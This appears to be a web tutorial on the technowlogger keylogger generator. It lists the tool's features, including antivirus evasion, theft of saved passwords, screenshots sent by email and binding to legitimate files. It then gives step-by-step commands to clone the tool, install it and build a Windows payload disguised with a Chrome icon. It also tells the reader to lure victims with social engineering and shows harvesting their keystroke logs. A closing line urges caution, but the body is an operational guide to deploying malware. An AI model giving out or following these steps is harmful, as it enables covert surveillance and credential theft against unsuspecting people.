Table of Contents
Overview on KeyLogger and Technowlogger
A keylogger is a tool mainly used by hackers to collect user input data on a device. An example of a keylogger is the technowlogger. Over the years, hackers have advanced in their art of hacking creating keyloggers which are hard to be detected by antivirus programs and easily fool the users into installing them. Hackers use social engineering techniques as discussed in earlier guides to deliver and install malicious key loggers on their victim.
Technowlogger is an example of the tools used by the hackers. It was made for education purposes and is hosted on the official GitHub repository. Technowlogger has the features of the keylogger malwares used by the black hat hackers in their malicious activities. Some of its features include;
- Works on both Windows and Linux operating systems.
- Technowlogger obfuscates the payload before generating it, hence bypasses few more antivirus.
- Notification for a new victim via email.
- Sends the screenshot of the victim PC's screen via email.
- Attacker can create for both Windows and Linux OS using Linux System, but can only create Windows executable using Windows Machine.
- Technowlogger can retrieve saved passwords from the victim system and sends it to attacker.
- Technowlogger is undetectable by antivirus programs.
- The keylogger is persistent.
- Tehcnowlogger creates an executable binary with zero dependencies.
- Technowlgger can distinguish log data on the basics of Active Window Name .
- You can add custom Icon to evil file.
- The payload created is about 5mb and has advanced functionality.
- Generated payload is encoded with base64, hence it is extremely difficult to reverse engineer the payload.
- Function which kills antivirus on victim PC and tries to disable the security.
- Awesome and colourful interface to generate payload on technowlogger.
- On attacker side: While creating payload, technowlogger script will automatically detect missing dependencies and install them..
- Built-in binder which binds the keylogger to any file [.pdf, .txt, .exe etc], hence running legitimate file on front end & evil codes in back-end as a service.
- Checks for already running instance on the system, If running instance found, then only legitimate file is executed [Multiple instances are prohibited to avoid same multiple logs emails].
In this guide we will be installing and using technowlogger tool to generate a payload on windows operating system.
- Have a PC running windows OS.
- Have python installed .
- Have knowledge of using the CMD.
Step 1: Download technowlogger from GitHub
To install the tool on our Linux operating system we will clone its GitHub repository using the below command. You can also choose to download it as a zip file.
Git clone https://github.com/PushpenderIndia/technowlogger.git
Step 2: Setup technowlogger and install dependencies
After downloading technowlogger tool, we change into its directory using below command in order to install other required dependencies.
Move into technologger directory
Command to install dependencies.
python -m pip install -r requirements.txt
Step 3: Generating a keylogger
Technowlogger has many both required and optional arguments to use while generating payloads. Some of these include options to; bind the payload to a legitimate looking file, provide the email and password to send logs to and option to provide custom icon for your file. For us to generate payload in this guide we will use a command as shown below.
python technowgen.py -e email@example.com -p yourpassword -w -o book --icon icon/chrome.ico
On the above command we use technowgen.py to generate a technowlogger payload. We also provide the email (-e firstname.lastname@example.org) password (-p yourpassword), the platform we are making the keylogger for, which is windows on our case (-w), the name for our payload (book) and the icon to be used on our payload (--icon icon/chrome.ico). On this step you also have to use some social engineering skills to lure your victims into clicking on the payload.
Now we can find our already generated payload in the dist folder within technowlogger tool folder as shown above.
Step 4: Install on target system and receive logs
To install the keylogger we generated on our target machine, we just need to send it to our victim and make sure they click on it to execute. Once executed, the keylogger will first check if there is another running instance of technowlogger keylogger. If a running instance is found, only the legitimate part of the file is executed to avoid installing keylogger twice receiving same logs two times.
As shown on the image above, the payload we generated using the technowlogger tool is hard to be detected as malicious as it bypasses the antivirus protection and also has the characteristic of a legitimate looking file. The victim will be fooled into clicking and executing the payload once he/she has downloaded it.
Step 5: Receiving logs
When the victim executes the keylogger, we can now receive his/her logs from the technowlogger email we provided while creating the payload. I ran the malicious file we had generated earlier on windows 10 and below is an example of the technowlogger reports I received.
As you can see we were are able to receive the operating system and the version and also the keys entered by our victim. These logs are now updated regularly depending on the intervals you set to receive them while generating the payload on technowlogger tool.
Keyloggers are one some of the common malwares affecting people around the world. They are used both for targeted attacks and mass attacks on individuals. The technowlogger tool makes generating of the keylogger tool easy by providing the essential components used to generate the keylogger under one tool. Technowlogger obfuscates the payload generated to prevent reverse engineering and also to be able to bypass antivirus programs.
As much as antivirus companies try to detect as many malware variants as possible, there are some which will still run undetected on the victims machine. Technowlgger is example of a tool that can be used to generate such malwares. It is a personal responsibility to ensure authenticity of any file before running it on your system.